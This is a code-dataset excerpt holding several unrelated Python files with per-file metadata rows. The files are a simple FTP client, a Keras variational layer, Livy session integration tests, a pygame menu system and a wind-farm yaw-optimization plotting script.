ftp_port(self.ftp_socket, self.data_address, self.data_port)
ftp_retr(self.ftp_socket, self.data_socket, path)
self.data_socket = None
elif command in ("stor", "put", "send"):
if len(arglist) == 1:
# create data socket
path = arglist[0]
self.data_socket = self.dataport()
# send file
if self.data_socket and os.path.exists(path) and os.path.isfile(path):
ftp_port(self.ftp_socket, self.data_address, self.data_port)
ftp_stor(self.ftp_socket, self.data_socket, path)
self.data_socket = None
elif command in ("appe", "append"):
if len(arglist) == 1:
# create data socket
path = arglist[0]
self.data_socket = self.dataport()
# send file
if self.data_socket and os.path.exists(path) and os.path.isfile(path):
ftp_port(self.ftp_socket, self.data_address, self.data_port)
ftp_appe(self.ftp_socket, self.data_socket, path)
self.data_socket = None
elif command in ("open", "ftp"):
if len(arglist) == 2 and arglist[1].isnumeric():
# attempt connection
host = arglist[0]
port = arglist[1]
self.ftp_socket = ftp_open(host, int(port))
# login to server
if self.ftp_socket:
# get server reply
print("Connected to {}".format(host))
reply = get_message(self.ftp_socket)
code, message = parse_reply(reply)
# login tree
if code != "230":
self.login()
else:
print("User logged in, proceed")
# debugging
elif command == "try":
# fast way to try (host, address) from config, for debugging
if len(arglist) == 0:
# atttempt connection
self.ftp_socket = ftp_open(self.host, int(self.port))
reply = get_message(self.ftp_socket)
code, message = parse_reply(reply)
# not logged in
if code == "530":
self.login()
else:
print("already logged in")
else:
print("Invalid command")
except Exception as e:
print("Error:", e)
def login(self):
"""
goal: define login protocol
type: (self) -> ()
help: Client.login <-> User.authenticate
"""
self.username = menu("username:")
self.password = menu("password:")
send_message(self.ftp_socket, self.username)
send_message(self.ftp_socket, self.password)
reply = get_message(self.ftp_socket)
code, message = parse_reply(reply)
if code == "230":
print("Logged into {}".format(self.host))
else:
print("Failed to log into {}".format(self.host))
self.logout()
def logout(self):
"""
goal: define logout protocol
type: (self) -> ()
"""
self.username = ""
self.password = ""
self.ftp_socket.close()
self.ftp_socket = None
def dataport(self):
"""
goal: create dataport
type: (self) -> socket | none
"""
try:
self.data_address = gethostbyname("")
self.next_dataport += 1
self.data_port = (self.dataport_min + self.next_dataport) % self.dataport_max
# create dataport
data_socket = socket(AF_INET, SOCK_STREAM)
data_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
data_socket.bind((self.data_address, self.data_port))
data_socket.listen(self.dataport_backlog)
return data_socket
except Exception as e:
print("Dataport error:", e)
return None
def test_me(self):
"""
goal: run test file
type: (self) -> ()
"""
if os.path.exists(self.test_file) and os.path.isfile(self.test_file):
for line in open(self.test_file):
tokens = parser(line)
command = tokens[0]
if command.startswith("# ") or not command:
pass
else:
self.tokens = tokens
self.dispatch()
pause = input("(press enter to continue): ")
# interface functions
def menu(prompt):
"""
goal: get and return userinput
type: (string) -> string
"""
userinput = input("{} ".format(prompt))
return userinput.strip()
def parser(userinput):
"""
goal: convert userinput into tokens
type: (string) -> [string]
"""
return userinput.strip().split()
# message functions
def send_message(ftp_socket, message):
"""
goal: send a message
type: (socket, string) -> ()
"""
if ftp_socket:
message = "\0" if not message else message
ftp_socket.send(message.encode())
def get_message(ftp_socket):
"""
goal: receive a message
type: (socket) -> string
"""
if ftp_socket:
return ftp_socket.recv(1024).decode()
def parse_reply(reply):
"""
goal: parse ftp server replay
type: (string) -> (string, string)
"""
tokens = parser(reply)
code = tokens[0]
message = " ".join(tokens[1:])
return code, message
# ftp commands
def ftp_pwd(ftp_socket):
"""
goal: print working directory
type: (socket) -> ()
"""
if ftp_socket:
send_message(ftp_socket, "pwd")
reply = get_message(ftp_socket)
code, message = parse_reply(reply)
if code == "200":
message = get_message(ftp_socket)
print(message)
def ftp_noop(ftp_socket):
"""
goal: simply recieve an ok reply
type: (socket) -> ()
"""
if ftp_socket:
send_message(ftp_socket, "noop")
reply = get_message(ftp_socket)
code, message = parse_reply(reply)
if code == "200":
reply = get_message(ftp_socket)
code, message = parse_reply(reply)
print(message)
def ftp_logout(ftp_socket):
"""
goal: logout user
type: (socket) -> ()
"""
if ftp_socket:
send_message(ftp_socket, "logout")
reply = get_message(ftp_socket)
def ftp_type(ftp_socket):
"""
goal: print out representation type
type: (socket) -> ()
"""
if ftp_socket:
send_message(ftp_socket, "type")
reply = get_message(ftp_socket)
code, message = parse_reply(reply)
if code == "200":
rep_type = get_message(ftp_socket)
print("type =", rep_type)
def ftp_port(ftp_socket, address, port):
"""
goal: let server know about data port
type: (socket, string, int) -> ()
"""
if ftp_socket:
port_command = "port {} {}".format(address, port)
send_message(ftp_socket, port_command)
reply = get_message(ftp_socket)
def ftp_list(ftp_socket, data_socket):
"""
goal: list directory contents
type: (socket, socket) -> ()
"""
if ftp_socket and data_socket:
send_message(ftp_socket, "list")
reply = get_message(ftp_socket)
code, message = parse_reply(reply)
if code == "200":
data_connection, data_host = data_socket.accept()
contents = get_message(data_connection)
print(contents)
data_connection.close()
def ftp_open(host, port=21):
"""
goal: create socket to host
type: (string, int) -> socket | none
"""
try:
ftp_socket = socket(AF_INET, SOCK_STREAM)
ftp_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
ftp_socket.connect((host, port))
return ftp_socket
except Exception as e:
print("ftp: Can't connect to '{}': {}".format(host, e))
return None
def ftp_cwd(ftp_socket, path):
"""
goal: change working directory
type: (socket, path) -> ()
"""
if ftp_socket:
cwd_command = "{} {}".format("cwd", path)
send_message(ftp_socket, cwd_command)
reply = get_message(ftp_socket)
def ftp_cdup(ftp_socket):
"""
goal: change to parent directory
type: (socket) -> ()
"""
if ftp_socket:
send_message(ftp_socket, "cdup")
reply = get_message(ftp_socket)
def ftp_mkd(ftp_socket, path):
"""
goal: make a directory
type: (socket, string) -> ()
"""
if ftp_socket:
mkd_command = "{} {}".format("mkd", path)
send_message(ftp_socket, mkd_command)
reply = get_message(ftp_socket)
def ftp_dele(ftp_socket, path):
"""
goal: delete a file
type: (socket, string) -> ()
"""
if ftp_socket:
dele_command = "{} {}".format("dele", path)
send_message(ftp_socket, dele_command)
reply = get_message(ftp_socket)
def ftp_rmd(ftp_socket, path):
"""
goal: remove directory
type: (socket, string) -> ()
"""
if ftp_socket:
rmd_command = "{} {}".format("rmd", path)
send_message(ftp_socket, rmd_command)
reply = get_message(ftp_socket)
def ftp_rn(ftp_socket, path, new_path):
"""
goal: rename a file
type: (socket, string, string) -> ()
"""
if ftp_socket:
rn_command = "{} {} {}".format("rn", path, new_path)
send_message(ftp_socket, rn_command)
reply = get_message(ftp_socket)
def ftp_retr(ftp_socket, data_socket, path):
"""
goal: retrieve a file
type: (socket, socket, path) -> ()
"""
if ftp_socket and data_socket:
retr_command = "{} {}".format("retr", path)
send_message(ftp_socket, retr_command)
reply = get_message(ftp_socket)
code, message = parse_reply(reply)
if code == "200":
data_connection, data_host = data_socket.accept()
packet = get_message(data_connection)
contents = packet
while packet:
packet = get_message(data_connection)
contents += packet
filename = os.path.basename(path)
with open(filename, "w") as file:
file.write(contents)
def ftp_stor(ftp_socket, data_socket, path):
"""
goal: send a file
type: (socket, socket, string) -> ()
"""
if ftp_socket and data_socket and os.path.exists(path) and os.path.isfile(path):
stor_command = "{} {}".format("appe", os.path.basename(path))
send_message(ftp_socket, stor_command)
reply = get_message(ftp_socket)
code, message = parse_reply(reply)
if code == "200":
data_connection, data_host = data_socket.accept()
with open(path, "r") as file:
packet = file.read(1024)
while packet:
send_message(data_connection, packet)
packet = file.read(1024)
def ftp_appe(ftp_socket, data_socket, path):
"""
goal: append a file
type: (socket, socket, string) -> ()
"""
if ftp_socket and data_socket and os.path.exists(path) and os.path.isfile(path):
appe_command = "{} {}".format("appe", os.path.basename(path))
send_message(ftp_socket, appe_command)
reply = get_message(ftp_socket)
code, message = parse_reply(reply)
if code == "200":
data_connection, data_host = data_socket.accept()
with open(path, "r") as file:
packet = file.read(1024)
while packet:
send_message(data_connection, packet)
packet = file.read(1024)
# controller functions
def main():
"""
goal: define program entrance
type: () -> int
"""
argc = len(sys.argv)
exit_success = 0
client = Client()
client.configure()
if argc > 1:
client.arguments()
client.start()
sys.exit(exit_success)
main() | 32.746522 | 111 | 0.521121 | 2,291 | 21,187 | 4.649498 | 0.114361 | 0.087871 | 0.054074 | 0.03389 | 0.466579 | 0.406872 | 0.346695 | 0.2684 | 0.219489 | 0.199305 | 0 | 0.008097 | 0.358805 | 21,187 | 647 | 112 | 32.746522 | 0.776003 | 0.103224 | 0 | 0.372596 | 0 | 0 | 0.081364 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0.028846 | 0.009615 | 0 | 0.108173 | 0.074519 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b7e0940d5b889afde32b2bd5c9b5e316e87b4c3 | 2,986 | py | Python | modules/tensorflow/keras/layers/variational.py | avogel88/compare-VAE-GAE | aa3419c41a58ca6c1a9c1031c0aed7e07c3d4f90 | [
"MIT"
] | null | null | null | modules/tensorflow/keras/layers/variational.py | avogel88/compare-VAE-GAE | aa3419c41a58ca6c1a9c1031c0aed7e07c3d4f90 | [
"MIT"
] | null | null | null | modules/tensorflow/keras/layers/variational.py | avogel88/compare-VAE-GAE | aa3419c41a58ca6c1a9c1031c0aed7e07c3d4f90 | [
"MIT"
] | null | null | null | import numpy as np
import tensorflow as tf
from tensorflow.keras.layers import Dense
from tensorflow.keras.losses import KLD, MSE
__all__ = ['Variational']
def normpdf(sample: tf.Tensor,
mean: float = 0.,
logvar: float = 0.,
axis: int = 1) -> tf.Tensor:
return tf.exp(lognormpdf(sample, mean, logvar, axis))
def lognormpdf(sample: tf.Tensor,
mean: float = 0.,
logvar: float = 0.,
axis: int = 1) -> tf.Tensor:
log2pi = tf.math.log(2. * np.pi)
return tf.reduce_sum(
-.5 * ((sample - mean) ** 2. * tf.exp(-logvar) + logvar + log2pi),
axis=axis)
class Variational(Dense):
"""Variational Bayes Layer.
Empirically captures mean and logarithmic variance of the source distribution.
Considers the ELBO of the marginal likelihood as loss which consists of
the divergence between posterior and prior and the reconstruction loss.
Here the divergence between posterior and prior is treated as variational loss.
ELBO = E_q(z|x) log p(x|z) - KLD(q(z|x), p(z))
KLD(q(z|x), p(z)) = E_q(z|x) log[q(z|x)/p(z)]
= E_q(z|x) [log q(z|x) - log p(z)]
Single sample Monte Carlo estimate of the ELBO:
ELBO = E [log p(x|z) + log p(z) - log q(z|x)]
Source: https://www.tensorflow.org/tutorials/generative/cvae#define_the_loss_function_and_the_optimizer
"""
def __init__(self, units: int):
super().__init__(2*units)
def call(self, inputs: tf.Tensor) -> tf.Tensor:
# Mean & Variance in one Dense Layer
latent = super().call(inputs)
# Reparameterization
mean, logvar = tf.split(latent, num_or_size_splits=2, axis=1)
eps = tf.random.normal(shape=tf.shape(mean))
z = eps * tf.exp(logvar * .5) + mean
# Loss
logpz = lognormpdf(z)
logqz_x = lognormpdf(z, mean, logvar)
div = -tf.reduce_mean(logpz - logqz_x)
self.add_loss(div)
# self.add_metric(value=logpz, name='logpz')
# self.add_metric(value=logqz_x, name='logqz_x')
# problems with metrics:
# logpz & logqz_x are not scalars
# enc: corrcoef(logpx, logqz_x)
# rec: corrcoef(logpx, logpx_z)
# gen: corrcoef(logpz, logpx_z)
"""Alternative with KLD (was not used during the experiments).
pz = normpdf(z)
qz_x = normpdf(z, mean, logvar)
self.add_loss(KLD(qz_x, pz))
"""
return z
@tf.function
def MSE(x: tf.Tensor, x_decoded: tf.Tensor) -> tf.Tensor:
"""MSE-loss optimized for variational inference.
MSE = E_q(z|x) log p(x|z)
Here in conjunction to the variational loss:
MSE = E log p(x|z)
"""
cross_ent = MSE(x, x_decoded)
cross_ent = tf.reshape(cross_ent, [tf.shape(x)[0], -1])
logpx_z = -tf.reduce_sum(cross_ent, axis=1)
return -tf.reduce_mean(logpx_z)
| 34.321839 | 107 | 0.595111 | 429 | 2,986 | 4.02331 | 0.314685 | 0.041715 | 0.015643 | 0.017381 | 0.147161 | 0.136732 | 0.093859 | 0.087486 | 0.075898 | 0.075898 | 0 | 0.008396 | 0.281983 | 2,986 | 86 | 108 | 34.72093 | 0.796642 | 0.373074 | 0 | 0.162162 | 0 | 0 | 0.006918 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.135135 | false | 0 | 0.108108 | 0.027027 | 0.378378 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b7e863b55ad61e3ed39373725c38c5ba8192557 | 4,582 | py | Python | tests/test_integration.py | vectra-ai-research/pylivy | dbcbebd69a1557b72f08428d60ffd13b84ff8d7d | [
"MIT"
] | 5 | 2021-06-22T08:09:45.000Z | 2021-08-11T14:40:12.000Z | tests/test_integration.py | vectra-ai-research/pylivy | dbcbebd69a1557b72f08428d60ffd13b84ff8d7d | [
"MIT"
] | null | null | null | tests/test_integration.py | vectra-ai-research/pylivy | dbcbebd69a1557b72f08428d60ffd13b84ff8d7d | [
"MIT"
] | null | null | null | from dataclasses import dataclass
import pytest
import requests
import pandas
from livy import (
LivySession,
LivyBatch,
SessionKind,
SparkRuntimeError,
SessionState,
)
@dataclass
class Parameters:
print_foo_code: str
print_foo_output: str
create_dataframe_code: str
dataframe_count_code: str
dataframe_count_output: str
error_code: str
RANGE_EXPECTED_DATAFRAME = pandas.DataFrame({"value": range(100)})
SPARK_CREATE_RANGE_DATAFRAME = """
import org.apache.spark.sql.Row
import org.apache.spark.sql.types._
val rdd = sc.parallelize(0 to 99)
val schema = StructType(List(
StructField("value", IntegerType, nullable = false)
))
val df = spark.createDataFrame(rdd.map { i => Row(i) }, schema)
"""
SPARK_TEST_PARAMETERS = Parameters(
print_foo_code='println("foo")',
print_foo_output="foo\n\n",
create_dataframe_code=SPARK_CREATE_RANGE_DATAFRAME,
dataframe_count_code="df.count()",
dataframe_count_output="res1: Long = 100\n\n",
error_code="1 / 0",
)
PYSPARK_CREATE_RANGE_DATAFRAME = """
from pyspark.sql import Row
df = spark.createDataFrame([Row(value=i) for i in range(100)])
"""
PYSPARK_TEST_PARAMETERS = Parameters(
print_foo_code='print("foo")',
print_foo_output="foo\n",
create_dataframe_code=PYSPARK_CREATE_RANGE_DATAFRAME,
dataframe_count_code="df.count()",
dataframe_count_output="100\n",
error_code="1 / 0",
)
SPARKR_CREATE_RANGE_DATAFRAME = """
df <- createDataFrame(data.frame(value = 0:99))
"""
SPARKR_TEST_PARAMETERS = Parameters(
print_foo_code='print("foo")',
print_foo_output='[1] "foo"\n',
create_dataframe_code=SPARKR_CREATE_RANGE_DATAFRAME,
dataframe_count_code="count(df)",
dataframe_count_output="[1] 100\n",
error_code="missing_function()",
)
SQL_CREATE_VIEW = """
CREATE TEMPORARY VIEW view AS SELECT id AS value FROM RANGE(100)
"""
@pytest.mark.integration
@pytest.mark.parametrize(
"session_kind, params",
[
(SessionKind.SPARK, SPARK_TEST_PARAMETERS),
(SessionKind.PYSPARK, PYSPARK_TEST_PARAMETERS),
(SessionKind.SPARKR, SPARKR_TEST_PARAMETERS),
],
)
def test_session(integration_url, capsys, session_kind, params):
assert _livy_available(integration_url)
with LivySession.create(integration_url, kind=session_kind) as session:
assert session.state == SessionState.IDLE
session.run(params.print_foo_code)
assert capsys.readouterr() == (params.print_foo_output, "")
session.run(params.create_dataframe_code)
capsys.readouterr()
session.run(params.dataframe_count_code)
assert capsys.readouterr() == (params.dataframe_count_output, "")
with pytest.raises(SparkRuntimeError):
session.run(params.error_code)
assert session.read("df").equals(RANGE_EXPECTED_DATAFRAME)
assert _session_stopped(integration_url, session.session_id)
@pytest.mark.integration
def test_sql_session(integration_url):
assert _livy_available(integration_url)
with LivySession.create(integration_url, kind=SessionKind.SQL) as session:
assert session.state == SessionState.IDLE
session.run(SQL_CREATE_VIEW)
output = session.run("SELECT COUNT(*) FROM view")
assert output.json["data"] == [[100]]
with pytest.raises(SparkRuntimeError):
session.run("not valid SQL!")
assert session.read_sql("SELECT * FROM view").equals(
RANGE_EXPECTED_DATAFRAME
)
assert _session_stopped(integration_url, session.session_id)
@pytest.mark.integration
def test_batch_job(integration_url):
assert _livy_available(integration_url)
batch = LivyBatch.create(
integration_url,
file=(
"https://repo.typesafe.com/typesafe/maven-releases/org/apache/"
"spark/spark-examples_2.11/1.6.0-typesafe-001/"
"spark-examples_2.11-1.6.0-typesafe-001.jar"
),
class_name="org.apache.spark.examples.SparkPi",
)
assert batch.state == SessionState.RUNNING
batch.wait()
assert batch.state == SessionState.SUCCESS
assert any(
"spark.SparkContext: Successfully stopped SparkContext" in line
for line in batch.log()
)
def _livy_available(livy_url):
return requests.get(livy_url).status_code == 200
def _session_stopped(livy_url, session_id):
response = requests.get(f"{livy_url}/session/{session_id}")
if response.status_code == 404:
return True
else:
return response.get_json()["state"] == "shutting_down"
| 26.952941 | 78 | 0.704059 | 563 | 4,582 | 5.470693 | 0.232682 | 0.031169 | 0.038961 | 0.028571 | 0.386364 | 0.329221 | 0.269156 | 0.249351 | 0.249351 | 0.195455 | 0 | 0.015487 | 0.182671 | 4,582 | 169 | 79 | 27.112426 | 0.806943 | 0 | 0 | 0.173228 | 0 | 0 | 0.21519 | 0.065255 | 0 | 0 | 0 | 0 | 0.11811 | 1 | 0.03937 | false | 0 | 0.062992 | 0.007874 | 0.181102 | 0.07874 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b7e86dcda0a74f36d2254f286c6cc746f1978c0 | 5,435 | py | Python | main/menu.py | FinleyDavies/super-pygame-bomberman | 84ba1d1b75ea0a56145c0b94372238805183f3e4 | [
"MIT"
] | null | null | null | main/menu.py | FinleyDavies/super-pygame-bomberman | 84ba1d1b75ea0a56145c0b94372238805183f3e4 | [
"MIT"
] | null | null | null | main/menu.py | FinleyDavies/super-pygame-bomberman | 84ba1d1b75ea0a56145c0b94372238805183f3e4 | [
"MIT"
] | null | null | null | import pygame
from button import Button
from threading import Thread
from queue import Queue
from time import sleep
class Menu:
KEYBIND = pygame.K_ESCAPE
FONT = "microsoftphagspa"
FONT_SIZE_BUTTON = 15
FONT_SIZE_TITLE = 40
FONT_SIZE_SUBTITLE = 20
BUTTON_HEIGHT = 50
BUTTON_WIDTH = 100
def __init__(self, screen, name=None, columns=1):
self.name = "Main Menu" if name is None else name
self.title_font = pygame.font.Font(pygame.font.match_font(self.FONT), self.FONT_SIZE_TITLE)
self.subtitle_font = pygame.font.Font(pygame.font.match_font(self.FONT), self.FONT_SIZE_SUBTITLE)
self.title = self.title_font.render(self.name, True, (10, 10, 10))
self.buttons = list()
self.layout = [list() for _ in range(columns)]
self.columns = columns
self.screen = screen
self.rect = screen.get_rect()
self.surface = pygame.Surface(self.rect.size, pygame.SRCALPHA)
self.is_open = False
self.same_frame = False # prevents button presses from registering twice when changing menus
self.add_button("Resume Game", self.close)
self.adjacents = []
def get_button_center(self, column):
# returns the center of the next button
center_x = (self.rect.width / (self.columns + 1)) * (column + 1)
center_y = self.BUTTON_HEIGHT + (self.BUTTON_HEIGHT + 10) * (len(self.layout[column]) + 1)
return center_x, center_y
def add_button(self, name, function, column=0, self_parameter=False):
button_rect = pygame.rect.Rect(0, 0, self.BUTTON_WIDTH, self.BUTTON_HEIGHT)
button_rect.center = self.get_button_center(column)
button = Button(self.surface, button_rect, name, function, self_parameter, font_name=self.FONT,
font_size=self.FONT_SIZE_BUTTON)
self.buttons.append(button)
self.layout[column].append(button)
def add_subtitle(self, name, column):
button_rect = pygame.rect.Rect(0, 0, self.BUTTON_WIDTH, self.BUTTON_HEIGHT)
button_rect.center = self.get_button_center(column)
button = Button(self.surface, button_rect, name, font_name=self.FONT,
font_size=self.FONT_SIZE_SUBTITLE, interactive=False, draw_rect=False)
self.buttons.append(button)
self.layout[column].append(button)
def add_menu(self, menu):
def on_press():
print(f"closing {self.name}")
self.close()
print(f"opening {menu.name}")
menu.same_frame = True
menu.open()
if menu not in self.adjacents:
self.adjacents.append(menu)
self.add_button(menu.get_name(), on_press)
menu.add_menu(self)
def update(self, event):
if event.type == pygame.KEYDOWN:
if event.key == self.KEYBIND:
if self.name == "Main Menu":
self.is_open = not self.is_open
else:
self.is_open = False
if self.is_open and not self.same_frame:
if event.type == pygame.MOUSEBUTTONDOWN:
for button in self.buttons:
button.press(pygame.mouse.get_pos())
for button in self.buttons:
button.update(pygame.mouse.get_pos())
self.same_frame = False
def draw(self):
if self.is_open:
self.surface.fill((255, 255, 255, 128))
rect = self.title.get_rect()
rect.center = (self.rect.width / 2, 30)
self.surface.blit(self.title, rect)
for button in self.buttons:
button.draw()
self.screen.blit(self.surface, (0, 0))
def open(self):
self.is_open = True
def close(self):
self.is_open = False
def get_name(self):
return self.name
class ControlsMenu(Menu):
CONTROLS = {"UP": pygame.K_w, "LEFT": pygame.K_a, "DOWN": pygame.K_s, "RIGHT": pygame.K_d, "PUNCH": pygame.K_j,
"DETONATE": pygame.K_k}
def __init__(self, screen, players, controls):
super().__init__(screen, "Controls", len(players) + 1)
self.players = players
self.controls = controls
self.set_buttons()
self.event_queue = Queue()
self.changing = False
def set_buttons(self):
# [self.layout[i+1].append(None) for i in range(len(self.layout)-1)]
for column, player in enumerate(self.players):
self.add_subtitle(player, column + 1)
for column in range(len(self.players)):
for control in self.controls:
self.add_button(control, self.change_binding, column + 1, True, )
def update(self, event):
super().update(event)
if self.changing:
self.event_queue.put(event)
def change_binding(self, button, callback):
# callback runs in separate thread and must return a string
if self.changing:
return
self.changing = True
button.change_text("Press key to assign")
def print_key():
while True:
event = self.event_queue.get()
if event.type == pygame.KEYDOWN:
break
button.render_text(f"{button.text}: {pygame.key.name(event.key)}")
self.changing = False
t = Thread(target=print_key)
t.start()
| 32.740964 | 115 | 0.605152 | 701 | 5,435 | 4.536377 | 0.202568 | 0.022642 | 0.025157 | 0.014151 | 0.220755 | 0.20566 | 0.179245 | 0.179245 | 0.179245 | 0.156604 | 0 | 0.012927 | 0.288316 | 5,435 | 165 | 116 | 32.939394 | 0.809204 | 0.042134 | 0 | 0.2 | 0 | 0 | 0.034801 | 0.005384 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.041667 | 0.008333 | 0.283333 | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b7e9c535b925d95a13599c206d4744f2e59d557 | 5,859 | py | Python | flasc/wake_steering/yaw_optimizer_visualization.py | NREL/flasc | ac734892efc1bc7684e2393ffa1ce7a97a54efa1 | [
"Apache-2.0"
] | 3 | 2022-01-23T19:33:32.000Z | 2022-03-14T10:29:36.000Z | flasc/wake_steering/yaw_optimizer_visualization.py | NREL/flasc | ac734892efc1bc7684e2393ffa1ce7a97a54efa1 | [
"Apache-2.0"
] | 2 | 2022-03-02T20:45:30.000Z | 2022-03-22T18:49:24.000Z | flasc/wake_steering/yaw_optimizer_visualization.py | NREL/flasc | ac734892efc1bc7684e2393ffa1ce7a97a54efa1 | [
"Apache-2.0"
] | 4 | 2022-02-17T18:40:36.000Z | 2022-03-24T05:44:31.000Z | # Copyright 2021 NREL
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
def plot_uplifts_by_atmospheric_conditions(
df_list,
labels=None,
ws_edges=np.arange(3.0, 17.0, 1.0),
wd_edges=np.arange(0.0, 360.0001, 3.0),
ti_edges = np.arange(0.0, 0.30, 0.02),
):
# Calculate bin means
ws_labels = (ws_edges[0:-1] + ws_edges[1::]) / 2.
wd_labels = (wd_edges[0:-1] + wd_edges[1::]) / 2.
ti_labels = (ti_edges[0:-1] + ti_edges[1::]) / 2.
# Format input
if isinstance(df_list, pd.DataFrame):
df_list = [df_list]
# Clean dataframes and calculate AEP gains
for ii, df in enumerate(df_list):
# Only keep cases with Pbl > 0 and non-NaNs
df = df.dropna(how='any', subset=['farm_power_baseline', 'farm_power_opt'])
df = df[df['farm_power_baseline'] > 0.01].reset_index(drop=True)
# Check if frequency vector exists
if not "farm_energy_baseline" in df.columns:
if "frequency" in df.columns:
df["frequency"] = df["frequency"].astype(float)
elif "freq" in df.columns:
df["frequency"] = df["freq"].astype(float)
else:
df["frequency"] = 1.0
print(
"No column 'freq' or 'frequency' found in dataframe." +
"Assuming a uniform distribution."
)
# Calculate wind farm energy, baseline and optimized
df["farm_energy_baseline"] = df["farm_power_baseline"] * df["frequency"]
df["farm_energy_opt"] = df["farm_power_opt"] * df["frequency"]
# Calculate relative and absolute uplift in energy for every condition
df["Prel"] = np.where(
df["farm_power_baseline"] > 0.0,
df["farm_power_opt"] / df["farm_power_baseline"],
0.0
)
df["Pabs"] = (
(df["farm_energy_opt"] - df["farm_energy_baseline"]) /
np.nansum(df["farm_energy_opt"] - df["farm_energy_baseline"])
)
# Bin data by wind speed, wind direction and turbulence intensity
df["ws_bin"] = pd.cut(df["wind_speed"], ws_edges, right=False, labels=ws_labels)
df["wd_bin"] = pd.cut(df["wind_direction"], wd_edges, right=False, labels=wd_labels)
df["ti_bin"] = pd.cut(df["turbulence_intensity"], ti_edges, right=False, labels=ti_labels)
df_list[ii] = df.copy() # Save updated dataframe to self
for yii, yq_col in enumerate(["Prel", "Pabs"]):
if yii == 0:
ylabel = "Relative power gain (%)"
else:
ylabel = "Contribution to AEP uplift (%)"
for xii, xq_col in enumerate(["ws_bin", "wd_bin", "ti_bin"]):
if xii == 0:
xlabel = "Wind speed (m/s)"
elif xii == 1:
xlabel = "Wind direction (deg)"
elif xii == 2:
xlabel = "Turbulence intensity (%)"
if np.all([df["turbulence_intensity"].unique() <= 1 for df in df_list]):
# Skip TI, if only optimized and evaluated for single TI
break
# Now produce plots with dataframes: wind speed vs. relative power gain
x = [None for _ in range(len(df_list))]
y = [None for _ in range(len(df_list))]
f = [None for _ in range(len(df_list))]
for dii, df in enumerate(df_list):
df_group = df.groupby(xq_col)
if yii == 0:
y[dii] = 100.0 * (df_group["Prel"].apply(np.nanmean) - 1.0)
else:
y[dii] = 100.0 * (df_group["Pabs"].apply(np.nansum))
f[dii] = df_group["frequency"].apply(np.nansum)
x[dii] = np.array(y[dii].index, dtype=float)
fig, ax = _plot_bins(x, y, f, xlabel, ylabel, labels)
def _plot_bins(x, y, yn, xlabel=None, ylabel=None, labels=None):
# Assume x, y and yn are lists of lists
if isinstance(x[0], (float, int)):
x = [x]
y = [y]
yn = [yn]
# Get number of dataframes to plot
nd = len(x)
if labels is None:
labels = [None for _ in range(nd)]
# Produce plots
fig, ax = plt.subplots(nrows=2, sharex=True, figsize=(10, 4))
if np.all([len(xi) <= 1 for xi in x]):
dx = 1.0 # Default to 1.0 bin width, if only one value
else:
dx = np.min(np.hstack([np.diff(xi) for xi in x])) * 0.8 / nd # Bin width
for dii in range(nd):
# Produce top subplot
ax[0].bar(x=x[dii] + (dii - 0.5) * dx, height=y[dii], width=dx, label=labels[dii])
ax[0].set_ylabel(ylabel)
ax[0].grid(True)
ax[1].bar(x=x[dii] + (dii - 0.5) * dx, height=yn[dii], width=dx, label=labels[dii])
ax[1].set_ylabel('Frequency (-)')
ax[1].set_xlabel(xlabel)
ax[1].grid(True)
ax[1].set_xticks(x[dii])
if len(x[dii]) > 50: # Too many ticks: reduce
xtlabels = ['' for _ in range(len(x[dii]))]
xtlabels[0::5] = ['%.1f' % i for i in x[dii][0::5]]
else:
xtlabels = ['%.1f' % i for i in x[dii]]
ax[1].set_xticklabels(xtlabels)
if not np.all([a is None for a in labels]):
ax[0].legend()
ax[1].legend()
return fig, ax
| 38.294118 | 98 | 0.565626 | 848 | 5,859 | 3.795991 | 0.287736 | 0.022367 | 0.020503 | 0.02361 | 0.168375 | 0.125505 | 0.09475 | 0.034793 | 0.013048 | 0 | 0 | 0.026053 | 0.299027 | 5,859 | 152 | 99 | 38.546053 | 0.757731 | 0.206179 | 0 | 0.068627 | 0 | 0 | 0.148388 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019608 | false | 0 | 0.029412 | 0 | 0.058824 | 0.009804 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
